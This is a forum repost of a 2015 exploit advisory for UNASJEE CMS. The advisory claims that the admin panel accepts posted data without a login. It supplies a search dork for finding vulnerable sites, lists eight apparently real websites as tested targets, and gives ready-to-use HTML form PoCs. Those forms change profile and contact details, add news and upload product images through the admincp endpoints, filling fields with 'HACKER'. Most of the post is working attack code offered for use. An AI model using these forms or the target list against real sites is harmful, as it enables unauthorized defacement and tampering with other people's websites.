Aerosol Posted March 24, 2015 Report Posted March 24, 2015 .__ _____ _______ | |__ / | |___ __\ _ \_______ ____ | | \ / | |\ \/ / /_\ \_ __ \_/ __ \ | Y \/ ^ /> <\ \_/ \ | \/\ ___/ |___| /\____ |/__/\_ \\_____ /__| \___ > \/ |__| \/ \/ \/ _____________________________ / _____/\_ _____/\_ ___ \ \_____ \ | __)_ / \ \/ / \ | \\ \____ /_______ //_______ / \______ / \/ \/ \/ UNASJEE CMS -> Admin Panel CSRF Vulnerability PoC Exploits~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[+] Discovered by: KnocKout[~] Contact : knockout@e-mail.com.tr[~] HomePage : http://h4x0resec.blogspot.com############################################################Greetz: KedAns-Dz & DaiMon & _UnDeRTaKeR_ & BARCOD3 & Septemb0x & ZoRLu http://milw00rm.com / http://fiXen.org ############################################################~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~|~Web App. : UNASJEE CMS|~Affected Version : All Version|~Vendor : http://www.unasjee.net/|~DORK : intext:Designed & Developed by: UNASJEE|~RISK : High|~Date: 22.03.2015|~Tested On : [L] Kali Linux####################INFO################################admin panel without login It is possible to post datathe server will accept absolute.########################################################Demo and Tested on;http://turnnersports.comhttp://www.badhawaind.comhttp://www.cliftonintl.comhttp://www.aqnaf.comhttp://shanisports.comhttp://tayyabgarments.comhttp://www.shreentrader.comhttp://www.moosaleathers.com-------------------------------------------------------------------------------------------------------------------- Change Profile Detai PoC---------------------------------------------------------- <!-- Change Profile Detail --> <body> <form action="http://[TARGET]/admincp/updprofile.php" method="POST"> <input type="hidden" name="pfid" value="1" /> <input type="hidden" name="sFullDescription" value="HACKERRRRRRR" /> <input type="hidden" name="p1" value="HACKERRRRRRR" /> <input type="hidden" name="Submit" value="Submit" /> <input type="submit" value="Submit request" /> </form> </body></html>---------------------------------------------------------- Add News PoC ---------------------------------------------------------- <form name="frmnews" method="post" action="http://[TARGET]/admincp/addnews.php" onSubmit="return checknForm();"> <tr> <td valign="top" bgcolor="E8EEF3"><strong> Title: </strong><span class="error">*</span> </td> <td valign="top" bgcolor="E8EEF3"> <input name="ntitle" type="text" class="txtdefault" id="ntitle"> </td> </tr> <tr> <td valign="top" bgcolor="E8EEF3"><strong> Date: </strong><span class="error">*</span></td> <td valign="top" bgcolor="E8EEF3"> <input name="nDate" type="text" class="txtdefault" id="nDate"> (YYYY-MM-DD)</td> </tr> <tr> <td width="25%" valign="top" bgcolor="E8EEF3"><strong> News:<span class="error"> </span></strong><span class="error">*</span></td> <td width="75%" valign="top" bgcolor="E8EEF3"> <textarea name="news" cols="30" rows="5" class="txtnews1" id="textarea"></textarea></td> </tr> <tr> <td bgcolor="E8EEF3"> </td> <td bgcolor="E8EEF3"><input type="image" src="img/add_news.jpg" width="77" height="24"></td> </tr> </form> </table></td> </tr> </table></td> </tr> <tr> <td align="center"><img src="imgs/spacer.GIF" width="1" height="30"></td> </tr> </table></td> </tr> </table></td> </tr> <tr>---------------------------------------------------------- Add Products PoC ---------------------------------------------------------- <td valign="top"><table width="450" border="0" cellpadding="1" cellspacing="2"> <form action="http://[TARGET]/admincp/addmainsection.php" enctype="multipart/form-data" method="post" name="frmnews" onSubmit="return checkmsecForm();"> <tr> <td width="29%" valign="top" bgcolor="E8EEF3"> <strong>Name:</strong></td> <td width="71%" valign="top" bgcolor="E8EEF3"><input name="SecName" type="text" class="txtdefault" id="SecName"> <font color="#FF0000">*</font></td> </tr> <tr> <td bgcolor="E8EEF3"> <strong>Show:</strong></td> <td bgcolor="E8EEF3"><table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="6%"><input name="show" type="radio" value="y" checked></td> <td width="13%">Yes</td> <td width="5%"><input type="radio" name="show" value="n"></td> <td width="76%">No</td> </tr> </table></td> </tr> <tr> <td bgcolor="E8EEF3"> <strong> Category Image:</strong></td> <td bgcolor="E8EEF3"><input name="bFile" type="file" class="txtfilefield1" id="bFile"> 70 x 62 px</td> </tr> <tr> <td bgcolor="E8EEF3"> </td> <td bgcolor="E8EEF3"><input type="image" src="img/addmain_section.jpg" width="121" height="24"></td> </tr> </form> </table></td> </tr> </table></td> </tr> <tr> ---------------------------------------------------------- Change Contact Details PoC---------------------------------------------------------- <form name="form1" method="post" action="http://[TARGET]/admincp/updcontact.php" > <input type="hidden" name="cid" value="1"> <table align=center width=525> <tr style="background-color:#B0B0B0; font-family:verdana; font-size:11; font-weight:bold; color:white"> <td height="25" colspan=3><div align="center">Change your Contact Detail:</div></td> </tr> <tr> <td width="35%"> </td> <td width="75%"> </td> <td> </td> </tr> <tr> <td width="35%" height="25" bgcolor="#CCCCCC"> First Contact Person:</td> <td width="75%"> </td> <td> </td> </tr> <tr> <td width="35%">Contact Person:</td> <td width="75%"> <input name=cp1 type=text id="cp1" value="HACKER"></td> <td width="16"> </td> </tr> <tr> <td width="35%">Designation:</td> <td width="75%"><input name=cpd1 type=text id="cpd1" value="HACKER"></td> <td> </td> </tr> <tr> <td width="35%">Mobile:</td> <td width="75%"><input name=cpm1 type=text id="cpm1" value="HACKER"></td> <td> </td> </tr> <tr> <td width="35%" height="25" bgcolor="#CCCCCC"> Second Contact Person:</td> <td width="75%"> </td> <td> </td> </tr> <tr> <td width="35%">Contact Person:</td> <td width="75%"><input name=cp2 type=text id="cp2" value=""></td> <td> </td> </tr> <tr> <td width="35%">Designation:</td> <td width="75%"><input name=cpd2 type=text id="cpd2" value=""></td> <td> </td> </tr> <tr> <td width="35%">Mobile:</td> <td width="75%"><input name=cpm2 type=text id="cpm2" value=""></td> <td> </td> </tr> <tr> <td width="35%" height="25" bgcolor="#CCCCCC"> Third Contact Person:</td> <td width="75%"> </td> <td> </td> </tr> <tr> <td width="35%">Contact Person:</td> <td width="75%"><input name=cp3 type=text id="cp3" value=""></td> <td> </td> </tr> <tr> <td width="35%">Designation:</td> <td width="75%"><input name=cpd3 type=text id="cpd3" value=""></td> <td> </td> </tr> <tr> <td width="35%">Mobile:</td> <td width="75%"><input name=cpm3 type=text id="cpm3" value=""></td> <td> </td> </tr> <tr> <td width="35%"> </td> <td width="75%"> </td> <td> </td> </tr> <tr> <td width="35%">Phone I:</td> <td width="75%"><input name=ph1 type=text id="ph1" value="HACKER"></td> <td> </td> </tr> <tr> <td width="35%">Phone II:</td> <td width="75%"><input name=ph2 type=text id="ph2" value=""></td> <td> </td> </tr> <tr> <td width="35%">Phone III:</td> <td width="75%"><input name=ph3 type=text id="ph3" value=""></td> <td> </td> </tr> <tr> <td width="35%"> </td> <td width="75%"> </td> <td> </td> </tr> <tr> <td width="35%">Fax I:</td> <td width="75%"><input name=fax1 type=text id="fax1" value="HACKER"></td> <td> </td> </tr> <tr> <td width="35%"> </td> <td width="75%"> </td> <td> </td> </tr> <tr> <td width="35%">E - Mail I:</td> <td width="75%"><input name=email1 type=text id="email1" value="HACKER"></td> <td> </td> </tr> <tr> <td width="35%">E - Mail II:</td> <td width="75%"><input name=email2 type=text id="email2" value=""></td> <td> </td> </tr> <tr> <td width="35%">E - Mail II:</td> <td width="75%"><input name=email3 type=text id="email3" value=""></td> <td> </td> </tr> <tr> <td width="35%"> </td> <td width="75%"> </td> <td> </td> </tr> <tr> <td width="35%">Web Site:</td> <td width="75%"><input name=web type=text id="web" value="HACKER"></td> <td> </td> </tr> <tr> <td> </td> <td> </td> <td> </td> </tr> <tr> <td>Skype:</td> <td><input name=skype type=text id="skype" value=""></td> <td> </td> </tr> <tr> <td>Yahoo:</td> <td><input name=yahoo type=text id="yahoo" value=""></td> <td> </td> </tr> <tr> <td>gTalk:</td> <td><input name=gtalk type=text id="gtalk" value=""></td> <td> </td> </tr> <tr> <td>MSN:</td> <td><input name=msn type=text id="msn" value=""></td> <td> </td> </tr> <tr> <td> </td> <td> </td> <td> </td> </tr> <tr> <td width="35%"><div><strong>Asia Head Office Address:</strong></div> <br></td> <td width="75%"><textarea name=haddress cols=38 rows=4 id="haddress" >HACKER</textarea></td> <td> </td> </tr> <tr> <td width="35%"><strong>Hong Kong Office Address:</strong> </td> <td width="75%"><textarea name=faddress cols=38 rows=4 id="faddress" ></textarea></td> <td> </td> </tr> <tr> <td><strong>Australian Office Address:</strong></td> <td><textarea name=fax2 cols=38 rows=4 id="fax2" ></textarea></td> <td> </td> </tr> <tr> <td width="35%"> </td> <td width="75%"><input type="submit" name="Submit" value="Submit"> <input name="reset" type="reset" id="reset" value="Reset"></td> <td> </td> </tr> </table> </form>Source Quote
